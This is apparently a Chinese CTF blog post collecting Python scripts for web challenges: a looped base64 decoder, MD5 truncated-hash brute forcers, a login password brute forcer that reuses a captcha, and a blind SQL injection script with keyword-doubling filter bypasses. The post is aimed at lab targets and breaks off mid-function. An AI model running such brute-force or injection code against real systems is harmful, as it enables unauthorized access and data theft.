1. 程式人生 > >CTF-web 第十一部分 實用指令碼

CTF-web 第十一部分 實用指令碼

在我們進行有關的WEB題目解答時,指令碼的的編寫是一個必不可少的必備的技能。一般需要我們使用指令碼的情況只有兩種:

(1)要求速度的時候,往往我們手動的提交或者計算並不能滿足題目的要求速度。

(2)大量重複性的工作,比如進行密碼或者等其他的爆破。

        這裡我們所記錄下來的指令碼,都是比較好懂的,常用的,在遇到有關的問題的時候,可以進行適當的修改。雖然前文在相關的部分已經附上了程式碼,但是在這裡總結一些吧,廢話不多數,直接上程式碼。

但是啊,我們自己還是需要多加練習的,當初比賽的時候,同組就有一個大佬,真的是手擼指令碼,跟他說需要啥功能,就看他在那裡自己造輪子,但是功底確實紮實,一會就弄出來了,相比之下我就不是很熟練..用什麼有時候還需要百度查一下。這裡的指令碼大部分都是做題的時候遇到的,或者更改的,有小部分是自己寫的,但是大部分都不是我弄得,提前說明一下哈。

 

迴圈多次解密

在題目中可能會有使用一個加密方法多次加密的情況,這時候我們就可以使用這個指令碼,其中的解密方法,資料等自己根據情況更改

import base64

def loopgetkey(data1):
        while 1:
            try:
                data1 = base64.decodebytes(data1)
            except:
                print(data1)
                break

data="Vm0wd2QyUXlVWGxWV0d4V1YwZDRWMVl3WkRSV01WbDNXa1JTVjAxV2JETlhhMUpUVmpBeFYySkVUbGhoTVVwVVZtcEJlRll5U2tWVWJHaG9UVlZ3VlZacVFtRlRNbEpJVm10a1dHSkdjRTlaVjNSR1pVWmFkR05GU214U2JHdzFWVEowVjFaWFNraGhSemxWVmpOT00xcFZXbUZrUjA1R1drWndWMDFFUlRGV1ZFb3dWakZhV0ZOcmFHaFNlbXhXVm1wT1QwMHhjRlpYYlhSWFRWaENSbFpYZUZOVWJVWTJVbFJDVjAxdVVuWlZha1pYWkVaT2NscEdhR2xTTW1ob1YxWlNTMkl4U2tkWGJHUllZbFZhY1ZadGRHRk5SbFowWlVaT1ZXSlZXVEpWYkZKSFZqRmFSbUl6WkZkaGExcG9WakJhVDJOdFJraGhSazVzWWxob1dGWnRNWGRVTVZGM1RVaG9hbEpzY0ZsWmJGWmhZMnhXY1ZGVVJsTk5XRUpIVmpKNFQxWlhTa2RqUm14aFUwaENTRlpxUm1GU2JVbDZXa1prYUdFeGNHOVdha0poVkRKT2RGSnJhR2hTYXpWeldXeG9iMWRHV25STldHUlZUVlpHTTFSVmFHOWhiRXB6WTBac1dtSkdXbWhaTVZwaFpFZFNTRkpyTlZOaVJtOTNWMnhXYjJFeFdYZE5WVlpUWVRGd1YxbHJXa3RUUmxweFVtMUdVMkpWYkRaWGExcHJZVWRGZUdOSE9WZGhhMHBvVmtSS1QyUkdTbkpoUjJoVFlYcFdlbGRYZUc5aU1XUkhWMjVTVGxOSFVuTlZha0p6VGtaVmVXUkhkRmhTTUhCSlZsZDRjMWR0U2tkWGJXaGFUVzVvV0ZsNlJsZGpiSEJIV2tkc1UySnJTbUZXTW5oWFdWWlJlRmRzYUZSaVJuQlpWbXRXZDFZeGJISlhhM1JVVW14d2VGVXlkR0ZpUmxwelYyeHdXR0V4Y0hKWlZXUkdaVWRPUjJKR2FHaE5WbkJ2Vm10U1MxUnRWa2RqUld4VllsZG9WRlJYTlc5V1ZscEhXVE5vYVUxWFVucFdNV2h2VjBkS1dWVnJPVlpoYTFwSVZHeGFZVmRGTlZaUFYyaHBVbGhCZDFac1pEUmpNV1IwVTJ0b2FGSnNTbGhVVlZwM1ZrWmFjVk5yWkZOaVJrcDZWa2N4YzFVeVNuSlRiVVpYVFc1b1dGZFdXbEpsUm1SellVWlNhVkp1UWxwV2JYUlhaREZaZUdKSVNsaGhNMUpVVlcxNGQyVkdWbGRoUnpsb1RWWndlbFl5Y0VkV01ERjFZVWhLV2xaWFVrZGFWM2hIWTIxS1IyRkdhRlJTVlhCS1ZtMTBVMU14VlhoWFdHaFlZbXhhVjFsc1pHOVdSbXhaWTBaa2JHSkhVbGxhVldNMVlWVXhXRlZyYUZkTmFsWlVWa2Q0YTFOR1ZuTlhiRlpYWWtoQ1NWWkdVa2RWTVZwMFVtdG9VRll5YUhCVmJHaERUbXhrVlZGdFJtcE5WMUl3VlRKMGIyRkdTbk5UYkdoVlZsWndNMVpyV21GalZrNXlXa1pPYVZKcmNEWldhMk40WXpGVmVWTnVTbFJpVlZwWVZGYzFiMWRHWkZkWGJFcHNVbTFTZWxsVldsTmhWa3AxVVd4d1YySllVbGhhUkVaYVpVZEtTVk5zYUdoTk1VcFZWbGN4TkdReVZrZFdXR3hyVWpOU2IxbHNWbmRXTVZwMFkwZEdXR0pHY0ZoWk1HUnZWMnhhV0ZWclpHRldWMUpRVlRCVk5WWXhjRWhoUjJoT1UwVktNbFp0TVRCVk1VMTRWVmhzVm1FeVVsWlpiWFIzWVVaV2RHVkZkR3BTYkhCNFZrY3dOVll4V25OalJXaFlWa1UxZGxsV1ZYaFhSbFoxWTBaa1RsWXlhREpXTVZwaFV6RkplRlJ1VmxKaVJscFlWRlJHUzA1c1drZFZhMlJXVFZad01GVnRkRzlWUmxwMFlVWlNWVlpYYUVSVk1uaGhZekZ3UlZWdGNFNVdNVWwzVmxSS01HRXhaRWhUYkdob1VqQmFWbFp1Y0Zka2JGbDNWMjVLYkZKdFVubGFSV1IzWVZaYWNtTkZiRmRpUjFFd1ZrUktSMVl4VGxsalJuQk9UVzFvV1ZkV1VrZGtNa1pIVjJ4V1UySkdjSE5WYlRGVFRWWlZlV042UmxoU2EzQmFWVmMxYjFZeFdYcGhTRXBWWVRKU1NGVnFSbUZYVm5CSVlVWk9WMVpHV2xaV2JHTjRUa2RSZVZaclpGZGlSMUp2Vlc1d2MySXhVbGRYYm1Sc1lrWnNOVmt3Vm10V01ERkZVbXBHV2xaWGFFeFdNbmhoVjBaV2NscEhSbGROTW1oSlYxUkplRk14U1hoalJXUmhVbFJXVDFWc2FFTlRNVnAwVFZSQ1ZrMVZNVFJXYkdodlYwWmtTR0ZHYkZwaVdHaG9WbTE0YzJOc2NFaFBWM0JUWWtoQ05GWnJZM2RPVmxsNFYyNVNWbUpIYUZoV2FrNU9UVlphV0dNemFGaFNiRnA1V1ZWYWExUnRSbk5YYkZaWFlUSlJNRmRXV2t0ak1WSjFWRzFvVTJKR2NGbFhWM2hoVW0xUmVGZHVSbEppVlZwaFZtMHhVMU5XV2xoa1J6bG9UVlZ3TUZsVldsTldWbHBZWVVWU1ZrMXVhR2haZWtaM1VsWldkR05GTlZkTlZXd3pWbXhTUzAxSFNYbFNhMlJVWW1zMVZWbHJaRzlXYkZwMFpVaGtUazFXYkROV01qVkxZa1pLZEZWdWJHRlNWMUl6V1ZaYVlXTnRUa1ppUm1ScFVqRkZkMWRXVWt0U01WbDRWRzVXVm1KRlNsaFZiRkpYVjFaYVIxbDZSbWxOVjFKSVdXdG9SMVpIUlhoalNFNVdZbFJHVkZZeWVHdGpiRnBWVW14a1RsWnVRalpYVkVKaFZqRmtSMWRZY0ZaaWEzQllWbXRXWVdWc1duRlNiR1JxVFZkU2VsbFZaSE5XTVZwMVVXeEdWMkV4Y0doWFZtUlNaVlphY2xwR1pGaFNNMmg1VmxkMFYxTXhaRWRWYkdSWVltMVNjMVp0TVRCTk1WbDVUbGQwV0ZKcmJETldiWEJUVjJzeFIxTnNRbGROYWtaSFdsWmFWMk5zY0VoU2JHUk9UVzFvU2xZeFVrcGxSazE0VTFob2FsSlhhSEJWYlRGdlZrWmFjMkZGVGxSTlZuQXdWRlpTUTFack1WWk5WRkpYWWtkb2RsWXdXbXRUUjBaSFlrWndhVmRIYUc5V2JYQkhZekpOZUdORmFGQldiVkpVV1d4b2IxbFdaRlZSYlVab1RXdHdTVlV5ZEc5V2JVcElaVWRvVjJKSFVrOVVWbHB6VmpGYVdXRkdhRk5pUm5BMVYxWldZV0V4VW5SU2JrNVlZa1phV0ZsVVNsSk5SbFkyVW10MGFrMVlRa3BXYlhoVFlWWktjMk5HYkZoV00xSm9Xa1JCTVdNeFpISmhSM2hUVFVad2FGWnRNSGhWTVVsNFZXNU9XR0pWV2xkVmJYaHpUbFpzVm1GRlRsZGlWWEJKV1ZWV1QxbFdTa1pYYldoYVpXdGFNMVZzV2xka1IwNUdUbFprVGxaWGQzcFdiWGhUVXpBeFNGTlliRk5oTWxKVldXMXpNVlpXYkhKYVJ6bFhZa1p3ZWxZeU5XdFVhekZYWTBoc1YwMXFSa2haVjNoaFkyMU9SVkZ0UmxOV01VWXpWbTF3UzFNeVRuTlVia3BxVW0xb2NGVnRlSGRsVm1SWlkwVmtWMkpXV2xoV1J6VlBZVlpLZFZGck9WVldla1oyVmpGYWExWXhWbkphUjNST1lURndTVlpxU2pSV01WVjVVMnRrYWxORk5WZFpiRkpIVmtaU1YxZHNXbXhXTURReVZXMTRhMVJzV25WUmFscFlWa1ZLYUZacVJtdFNNV1IxVkd4U2FFMXRhRzlXVjNSWFdWZE9jMVp1UmxSaE0xSlZWbTE0UzAxR2JGWlhhemxYVFZad1NGWXljRXRXTWtwSVZHcFNWV0V5VWxOYVZscGhZMnh3UjFwR2FGTk5NbWcxVm14a2QxUXhWWGxUV0docFUwVTFXRmx0TVZOWFJsSlhWMjVrVGxKdGRETlhhMVpyVjBaSmQyTkZhRnBOUm5CMlZqSnplRk5HVm5WWGJHUk9ZbTFvYjFacVFtRldNazV6WTBWb1UySkhVbGhVVmxaM1ZXeGFjMVZyVG1oTlZXdzBWVEZvYzFVeVJYbGhTRUpXWWxoTmVGa3dXbk5XVmtaMVdrVTFhVkp1UVhkV1JscFRVVEZhY2sxV1drNVdSa3BZVm01d1YxWkdXbkZUYTFwc1ZteGFNVlZ0ZUdGaFZrbDRVbGhrVjJKVVJUQlpla3BPWlVkT1JtRkdRbGRpVmtwVlYxZDBWMlF4WkhOWGEyaHNVak5DVUZadGVITk9SbGw1VGxaT1YySlZjRWxaVlZwdlZqSkdjazVWT1ZWV2JIQm9WakJrVG1WdFJrZGhSazVwVW01Qk1sWXhXbGRaVjBWNFZXNU9XRmRIZUc5VmExWjNWMFpTVjFkdVpHaFNiRmt5VlcxME1HRnJNVmRUYWtaWFZqTm9VRmxXV2twbFJrNTFXa1prYUdFd2NGaFdSbFpXWlVaSmVGcElTbWhTTTFKVVZGVmFkMlJzV2tkYVNIQk9WakZhZWxZeGFITlVNVnB5VGxjNVZWWnNXak5VVlZwaFYwVTFWbFJzWkU1aE0wSktWMVpXVjFVeFdsaFRiR3hvVWpKb1dGbHJXbmRWUmxwelYydDBhazFXY0hsVWJGcHJZVmRGZDFkWWNGZGlXR2h4V2tSQmVGWXhVbGxoUm1ob1RXMW9WbGRYZEd0aU1rbDRWbTVHVW1KVldsaFphMXAzVFVad1ZtRkhkRlZoZWtaYVZWZDRjMWxXV2xoaFJYaGFZVEZ3WVZwVldtdGpiVTVIWVVkb1RsZEZTbEpXYlRGM1V6RktkRlpyYUZWaE1WcFlXV3RrVTFaR1ZuTlhibVJzVm0xU1dsa3dWbXRXTWtwWFVtcE9WVlpzV25wWlZscEtaVmRHUjFWc2NHbFNNbWd5Vm1wR1lXRXhaRWhXYTJoUVZtdHdUMVpzVWtaTlJtUlZVVzFHV2xac2JEUlhhMVp2WVVaS2MxTnNXbGRpVkVaVVZtdGFkMWRIVmtsVWJHUnBVakZLTmxaclkzaGlNVmw1VWxod1VsZEhhRmhXYlRGU1RVWndSVkpzY0d4V2F6VjZXV3RhWVdGV1NYbGhSemxYVmpOU1dGZFdaRTlqTVZwMVVteFNhRTB4U2xaV2JURjZUVlV4UjFadVVteFNWR3h3VldwQ2QxZHNiRlpWYkU1WFRVUkdXVlpXYUd0WFJscDBWV3hPWVZac2NHaFpNbmgzVWpGd1IyRkdUazVOYldjeFZtMTRhMlF4UlhoaVJtaFZZVEpTV0ZsdGVFdGpNVlYzV2taT2FrMVhlSGxXTWpWUFZERmFkVkZzWkZwV1YxRjNWakJhUzJOdFNrVlViR1JwVjBWS1ZWWnFTbnBsUmtsNFZHNU9VbUpIVWs5WlYzUmhVMFprYzFkdFJsZE5helY2V1RCV2IxVXlTa2hWYXpsVlZucEdkbFV5ZUZwbFJsWnlZMGQ0VTJGNlJUQldWRVp2WWpKR2MxTnNhRlppVjJoWFdXdGFTMWRHV2tWU2JHUnFUV3RhUjFaSGVGTlViRnAxVVZoa1YxSnNjRlJWVkVaaFkyc3hWMWRyTlZkU2EzQlpWMWQwYTJJeVVuTlhXR1JZWWxoU1ZWVnFRbUZUVm14V1YyMUdWV0pGY0RGVlZ6QTFWakpLVlZKVVFscGxhM0JRV1hwR2QxTldUblJrUms1T1RVVndWbFl4WkRCaU1VVjNUbFZrV0dKcmNHRlVWRXBUVlVaYWRHVklUazlTYkd3MVZHeFZOV0ZIU2taalJteGFWbFp3ZWxacVNrWmxSbHBaWVVkR1UwMHlhRFpXYlhCSFdWWmtXRkpyWkdoU2F6VndWVzAxUWsxc1dYaFhiR1JhVmpCV05GWlhOVTlYUm1SSVpVYzVWbUV4V2pOV01GcFRWakZrZFZwSGFGTmlSbXQ1VmxjeE1FMUhSbkpOVm1SVVlXdGFXRlpxVG05U1JscHhVMnQwVTAxck5VaFphMXB2VmpBd2VGTnFTbGRXYkVwSVZsUkdXbVZIVGtaaVJsWnBVakpvZDFadGVHRmtNV1JIVjJ0a1dHSlZXbkZVVlZKWFUwWlplR0ZJVGxWTlZuQjVWR3hqTlZaV1duTlhibkJWWWtad2VsWnRNVWRTYkZKeldrZHNWMWRGU2t0V01WcFhWakZWZUZkWVpFNVdiVkp4VldwS2IxbFdVbGRYYm1SV1VtMTBORll5ZUd0aGF6RllWVzVzVldKR2NISldSM2hoVjBkUmVtTkdaR2xYUjJoVlZsaHdRbVZHVGtkVWJHeHBVbXMxYjFSWGVFdFdiR1JZVFZod1RsWnNjRmhaYTJoTFdWWktObUpHYUZwaE1YQXpXbGQ0V21WVk5WaGtSbFpvWld0YVdsZHNWbUZoTVZsM1RWaEdWMkpyY0ZoV2ExWjNWRVpWZUZkclpHcGlWVnBJVjJ0YVQxUnJNWFJoUmxwWFlsUkdNMVY2Ums1bFZsSjFWR3hXYVdFelFuWldWekI0VlRGYVIxVnNWbFJpVkd4d1ZGWmFkMlZXV2xoa1JFSldUVVJHV1ZaWGRHOVdhekYxWVVod1dGWnNjRXRhVjNoSFl6RldjMXBIYUdobGJGbDVWbTF3UjFsWFJYaGFSV2hYWVRKb1VWWnRkSGRVTVZwMFpFaGtWRlp0VWxaVlZ6RkhZVlV4Y2xkcVFsZGlWRlpNVmpCa1MxTkhWa2RhUm5CcFVqSm9WVlpHVWtka01WbDRXa2hTYTFJelFuQlZha1pLWkRGYVJWSnRkR2xOVm13elZGWldhMkZGTUhsbFJtaGFZa1pLUTFwVlduTmpWa3B6WTBkNFUySldTalZXYWtvMFZUSkdXRk5yYkZKaVIyaFlXV3hvVTFkR1pGZGFSbVJxVFZkU01WVnRlRTloVmtsNFUyNW9WMUpzY0hKV1ZFcFhZekpLUjFkdFJsUlNWRloyVm0weE5HUXlWbGRoTTJSV1lsVmFXRlJWVWtkWFZscFhZVWQwV0ZKc2NEQldWM2hQV1ZaYWMyTkhhRnBOYm1nelZXcEdkMUl5UmtkVWF6Vk9ZbGRqZUZadE1UUmhNREZIVjFob1ZWZEhhR2hWYkdSVFZqRnNjbHBHVGxoV2JYZ3dWRlphVDJGck1WZGpSRUpoVmxkb1VGWkVSbUZrVmtaeldrWndWMVl4UmpOV2FrSmhVMjFSZVZScldtaFNia0pQVlcwMVEwMXNXbkZUYm5Cc1VtczFTVlZ0ZEdGaVJrcDBWV3M1V21KVVJuWlpha1poWTFaR2RGSnNaRTVoZWxZMlYxUkNWMkl4VlhsVGEyaFdZa2RvVmxadGVHRk5NVnBZWlVkR2FrMVdXbmxXUjNocllVZFdjMWRzYkZkaGExcDJXV3BLUjJNeFRuTmhSMmhUWlcxNFdGZFdaREJrTWxKelYydFdVMkpHY0hKVVZscDNaVlp3UmxaVVJtaFdhM0F4VlZab2ExZEhTa2RYYmtaVllrZFNSMXBFUVhoV01XUnlUbFprVTJFelFscFdiVEIzWlVkSmVWVnVUbGhYUjFKWldXeG9VMVpXVm5GUmJVWlVZa1phTUZwVlpFZGhSbHB5WWtSU1ZtSkhhSEpXYWtwTFZsWktWVkZzY0d4aE0wSlFWMnhXWVdFeVVsZFdiazVWWWxkNFZGUldWbmRXYkZsNFdrUkNWMDFzUmpSWGEyaFBWMGRGZVdGSVRsWmhhelZFVmxWYVlXUkZNVmRVYkZKVFlrZDNNVlpIZUZaT1YwWklVMnRhYWxKRlNtaFdiR1JUVTBaYWMxZHRSbGROYXpWSVYydGFWMVl5U2tsUmFscFhZbGhDU0ZkV1dtdFhSa3B5WVVkd1UwMXVhRmxXYWtKWFV6Rk9SMWR1VW14U00xSlFWV3BDVjA1R1dsaE9WazVXVFd0d2VWUnNXbk5YYlVWNFkwZG9WMDFXY0doYVJWVjRWakZPY2s1V1RtbFNiWFExVm14amQyVkdTWGxTYmxKVFlXeHdXRmxyWkc5WlZteFZVbTVrVlZKdGVGaFdNblF3WVdzeGNrNVZhRnBoTVhCMlZtcEJkMlZHVG5SUFZtaG9UVlZ3U1ZkV1VrZFhiVlpIWTBWc1ZHSlhhRlJVVkVaTFZsWmFSMVp0Um10TlYxSllWakowYTFsV1RrbFJiazVXWWtaS1dGWXdXbUZrUlRWWFZHMW9UbFpYT0hsWFYzUmhZVEZhZEZOc2JHaFRTRUpXV1d0YWQyVnNXblJOVldSVFlrWktlbGRyWkhOV01XUkdVMnQwVjAxV2NGaFdha1pXWlVaa1dWcEZOVmRpVmtwNFZsZHdTMkl4YkZkVmJHUllZbTFTVjFWdE1UQk9SbGw1WlVkMGFHRjZSbGxXVnpWelZsZEtSMk5JU2xkU00yaG9WakJrVW1WdFRrZGFSMnhZVWpKb1ZsWnNhSGRSYlZaSFZHdGtWR0pIZUc5VmFrSmhWa1phY1ZOdE9WZGlSMUpaV2tWa01HRlZNWEppUkZKWFlsUldWRlpIZUdGT2JVcElVbXhrYVZkSFozcFhiRnBoV1ZkU1JrMVdXbUZTYkZwdldsZDBZVmRzWkhOV2JVWm9UVlpzTTFSV2FFZFdNa3B5WTBab1YyRXhXak5XUlZwV1pVWmtjbHBIY0dsV1ZuQkpWakowWVZReFVuSk5XRkpvVW14d1dGbHNVa2ROTVZZMlVtczFiRlpzU2pGV1IzaFhZVmRGZWxGdWFGZFdla0kwV1dwS1QxSXhXblZWYlhoVVVqRktkMVpHV210Vk1XUkhWMnhvYTFKRlNsZFVWVkpIVjBac2NsVnNUbGROVld3MldWVm9kMWRzV1hwaFJYaGhVbXh3U0ZreWN6VldNVnB6V2tkNGFFMVhPVFZXYlRGM1VqRnNWMkpHWkZSWFIyaHdWV3RhZDFaR2JITmFSRkpWVFZad2VGVnRkREJXUmxwelkwaG9WazFXU2toV1ZFRjRWakZhY1Zac1drNWliRXB2VjFaa05GUXhTbkpPVm1SaFVtNUNjRlZ0ZEhkVFZscDBaRWRHV0dKV1dsbFdiWFJ2WVRGSmVsRnVRbFppVkZaRVZtcEdZVmRGTVZWVmJXeE9WbXhaTVZaWGVHOWtNVlowVTJ4YVdHSkhhRmhaYkZKSFZURlNWbGR1VGs5aVJYQXdXa1ZhVDFSc1dYaFRXR2hYWWtkUk1GZFdaRWRUUms1eVlrWkthVkl4U2xsWFYzaFRVbXN4UjJORlZsUmlSMUp4VkZaa1UwMVdWblJsUlRsb1ZtdHNORlV5Tlc5V01VcHpZMGhLVjFaRmNGaFpla3BMVWpGa2RGSnNVbE5XUmxveVZtMHdlRTVIVVhsV2JHUm9UVEpTV1ZsdE1WTlhSbEpZWkVoa1ZGWnNjRWxaTUZwUFZqRlpkMVpxVmxkV00yaFFWMVphWVdNeVRraGhSbkJPWW0xbmVsWlhjRWRrTVU1SVUydG9hVkpyTlZsVmJGWjNWVEZhZEUxSVpHeFNWRlpKVld4b2IxWXhaRWhoUjJoV1lrZFNWRlpxUm5OamJHUjFXa1prVGxZemFGZFdWRW8wVkRKR2NrMVdaR3BTUlVwb1ZteGFXbVF4YkhKYVJYUlRUV3MxUmxWWGVGZFdNVnB5WTBac1YySllRa05hVlZwTFZqRk9kVlJ0UmxOaWEwcDNWMWN4TUZNeFVsZFhibEpPVTBkb1ZWUldaRk5YUmxwMFRsWmtXRkl3Y0VsV1Z6QTFWMnhhUmxkcVRscGhhMXBvVmpCVmVGWldWblJoUlRWb1pXeFdNMVp0TUhoTlIwVjRZa1prVkZkSGVHOVZibkJ6Vm14YWNsWnJkRlZTYkhCWldsVmtSMkZyTVZoa1JGcGFWbFpWTVZaVVNrdFhWMFpIWTBaa2FFMVlRakpYVjNCTFVqSk5lRlJ1VG1oU01taFZWV3hXZDFkR1pGaGxSemxWWWxaYVNGWXlkRmRWTWtwV1YyNUdWVlp0VWxSYVYzaHlaREZ3UlZWdGFGZGhNMEY0VmxaYWIyRXhaRWhUYTJSWVltdHdWMWxYZEdGaFJtdDVZek5vVjAxWFVqQlphMXBQVlRKRmVsRnRPVmROVm5CVVZXcEtVbVZXVW5WVWJHaFlVakZLYjFaWGVHOVZNazVYWWtoT1YxWkZXbFJVVmxwSFRrWlplVTFVUW1oU2JIQXdWbGQwYzFkSFJuSk9WRTVYWVd0d1NGa3llRTlrUjBaSFkwZDRhRTFZUWpWV2JYQkRXVlpWZVZSdVRtcFNWMmhVV1d0Vk1XTkdXblJrU0dSWFlrWnNORmRyVWtOWGJGbDRVbXBPVldKR2NISldNR1JMWXpGT2NrOVdaR2hOVm5CTlZqRmFZVmxYVWtoV2ExcGhVbFJzVkZscmFFSmtNV1J6Vm0xR2FFMVdjRmxWTW5SaFlXeEtXR1ZIUmxWV1JUVkVXbFphVjFJeFNsVmlSa1pXVmtSQk5RPT0="
loopgetkey(bytes(data, encoding='utf-8'))

快速獲取響應資訊並提交

import base64
import requests

# 本題目提醒 快速 提交給ichunqiu你發現的 需要session保持會話
# 測試相應中有ZmxhZ19pc19oZXJlOiBOalkwTXpZMA== 嘗試base64解碼 得到flag_is_here: NjY0MzY0= (每次不一樣) 還需要解碼
# 再次post提交 {"ichunqiu": 解碼資料}

url = "http://607d622601d049a3a3e7ef03f58670e445529dac09dd4a96.game.ichunqiu.com/"
a = requests.session()
b = a.get(url)
data = b.headers["flag"]
datadecode = base64.b64decode(data)

# flag_is_here: NjY0MzY0 需要使用:進行分組
splitstr = str(datadecode).split(':')
key = splitstr[1].replace('\'', '')

# 對後面的再次解碼
key1 = base64.b64decode(key)
body = {"ichunqiu": key1}
print(body)
f = a.post(url, data=body)
print(f.text)


# 原版好用 但是過濾不強
# import base64,requests
#
# a = requests.session()
# b = a.get("http://8564a824863f418484029f2013a3dcf3412fa4677a31498d.game.ichunqiu.com/")
# key1 = b.headers["flag"]
# c = base64.b64decode(key1)
# d = str(c).split(':')
# key = base64.b64decode(d[1])
# body = {"ichunqiu":key}
# f = a.post("http://8564a824863f418484029f2013a3dcf3412fa4677a31498d.game.ichunqiu.com/", data=body)
# print(f.text)

MD5截斷值爆破

 MD5截斷數值已知 求原始資料,這種題是十分常見的

import hashlib
from multiprocessing.dummy import Pool as ThreadPool

# MD5截斷數值已知 求原始資料
# 例子 substr(md5(captcha), 0, 6)=60b7ef

def md5(s):  # 計算MD5字串
    return hashlib.md5(str(s).encode('utf-8')).hexdigest()


keymd5 = '8e6d35'   #已知的md5截斷值
md5start = 0   # 設定題目已知的截斷位置
md5length = 6

def findmd5(sss):    # 輸入範圍 裡面會進行md5測試
    key = sss.split(':')
    start = int(key[0])   # 開始位置
    end = int(key[1])    # 結束位置
    result = 0
    for i in range(start, end):
        # print(md5(i)[md5start:md5length])
        if md5(i)[0:6] == keymd5:            # 拿到加密字串
            result = i
            print(result)    # 列印
            break


list=[]
for i in range(10):   # 多執行緒的數字列表 開始與結尾
    list.append(str(10000000*i) + ':' + str(10000000*(i+1)))
pool = ThreadPool()    # 多執行緒任務
pool.map(findmd5, list)
pool.close()
pool.join()

MD5截斷值爆破2

這個指令碼不同於上一個的地方是,對原本的數值是有要求的,比如變數擁有一部分固定值,猜測是字元是在一定範圍內的

import hashlib
import random
import requests
# MD5截斷數值已知
# 變數值有一定要求
# 求原始資料

# 本題 限制120s 爆破10次以上 變數固定前兩個字元,MD5截斷為固定值


def md5(s):
    return hashlib.md5(str(s).encode('utf-8')).hexdigest()


# substr(md5($value),5,4)==0)
def findbest(s):
    for i in range(1000000):
        str = s + random.choice(guess)
        str = str + random.choice(guess)
        str = str + random.choice(guess)
        str = str + random.choice(guess)
        str = str + random.choice(guess)
        str = str + random.choice(guess)
        if (md5(str))[5:9] == "0000":
            print(str)
            return str

# 訪問並擷取新的關鍵字
def url_open(keystr, url, session):
    payload= "value="+keystr
    respon = a.get(url + payload).text
    print(respon[0:2])
    return respon[0:2], len(respon), respon

# 初始連線 字符集
urllink = "http://aa153e3db8114f409fa459050284db8920827b2ffaa34944.game.ichunqiu.com/?"
# guess = ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"]
guess = "abcdefghijklmnopqrstuvwxyz"
a = requests.session()


# 初始key關鍵字
keyfirst = 'ea'
# 普通返回長度
normallen = 0

for i in range(1, 100):
    # 尋找滿足條件的字串
    keystr = findbest(keyfirst)

    # 請求獲取新的key關鍵字 記錄普通長度 比對flag長度
    keyfirst,length, res = url_open(keystr, urllink, a)
    if i == 1:
        normallen =length
    else:
        if normallen < length:
            print(res)
            break

一次驗證,爆破密碼

在有關驗證碼的題目中,我們有的題目只需要一次驗證即可以一直使用,在這種情況下,需要我們爆破擁有一定格式的密碼(可以自行設定裁剪的範圍)

import  requests
# 針對一次性驗證碼 爆破數字密碼用

url = 'http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/login.php'
header = {
            "Host": "lab1.xseclab.com",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
            "Accept-Encoding": "gzip, deflate",
            "Referer": "http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/index.php",
            "Cookie": "PHPSESSID=7667f63d7c38a42374e3afaa9a203d86",
            "Connection": "close",
            "Upgrade-Insecure-Requests": "1",
            "Content-Type": "application/x-www-form-urlencoded",
            "Content-Length": "48"
         }

# 設定引數變化範圍
start = 1000
final = 9999
step = 1
startlength = 0  # 記錄初始返回相應的長度 如果響應長度發生變化 那就是找到了
for i in range(start, final, step):
    payload = {'username': 'admin', 'pwd': i, 'vcode': 'JQ28', 'submit': 'submit'}
    contents = requests.post(url=url, headers=header, data=payload).content.decode('utf-8')
    if i == start:
        startlength = len(contents)
    else:
        if len(contents) > startlength:
            print("%d : %s" % (i, contents))
            break

sql 暴力猜解

import requests
# 本指令碼用於自動爆破資料庫長度 名字 表的長度名字 欄位數值等
# 使用中,6個函式需要自己手動執行,根據返回的引數帶入到下一個函式進行
# 具體的每個函式的利用程式碼 需要根據情況更改

url = "http://ctf5.shiyanbar.com/web/earnest/index.php"  # 測試的路徑
str = "You are in"   # 成功時可以在響應中匹配到的字串,用於判斷
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."  # 名字猜解的字元範圍

def get_ku_length():
    print('start')
    for i in range(1, 30):
        key = {'id': "0'oorr(length(database())=%s)oorr'0" % i}
        res = requests.post(url, data=key).text
        print(i)
        if str in res:
            print("find the length %s" %i)
            break

def get_ku_name():
    database = ''
    print('start')
    for i in range(1, 19):
        for j in guess:
            key = {'id': "0'oorr((mid((database())from(%s)foorr(1)))='%s')oorr'0" % (i, j)}
            res = requests.post(url, data=key).text
            print('............%s......%s.......' % (i, j))
            if str in res:
                database += j
                break
    print(database)


def get_table_length():
    i = 1
    print("start")
    while True:
        # 多個表名使用@隔開
        res = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='')oorr'0" % i
        res = res.replace(' ', chr(0x0a))
        key = {'id': res}
        r = requests.post(url, data=key).text
        print(i)
        if str in r:
            print("length: %s" % i)
            break
        i += 1
    print("end!")

def get_table_name():
    table = ""
    print("start")
    for i in range(1, 12):
        for j in guess:
            res = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tab" \
                  "les)where(table_schema)=database())='%s')oorr'0" % (i, j)
            # 由於遮蔽空格 替換為換行符號
            res = res.replace(' ', chr(0x0a))
            key = {'id': res}
            r = requests.post(url, data=key).text
            print('---------%s---------%s' % (i, j))
            if str in r:
                table += j
                break
    print(table)
    print("end!")


def get_ziduan_length(table_name):
    i = 1
    print("start")
    while True:
        # res = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='')oorr'0" % i
        res = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)="% i
        res += "'"+table_name + "')='')oorr'0"
        print(res)
        res = res.replace(' ', chr(0x0a))
        key = {'id': res}
        r = requests.post(url, data=key).text
        print(i)
        if str in r:
            print("length: %s" % i)
            break
        i += 1
    print("end!")

def get_ziduan_name():
    column = ""
    print("start")
    for i in range(1, 6):
        for j in guess:
            res = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0" % (
            i, j)
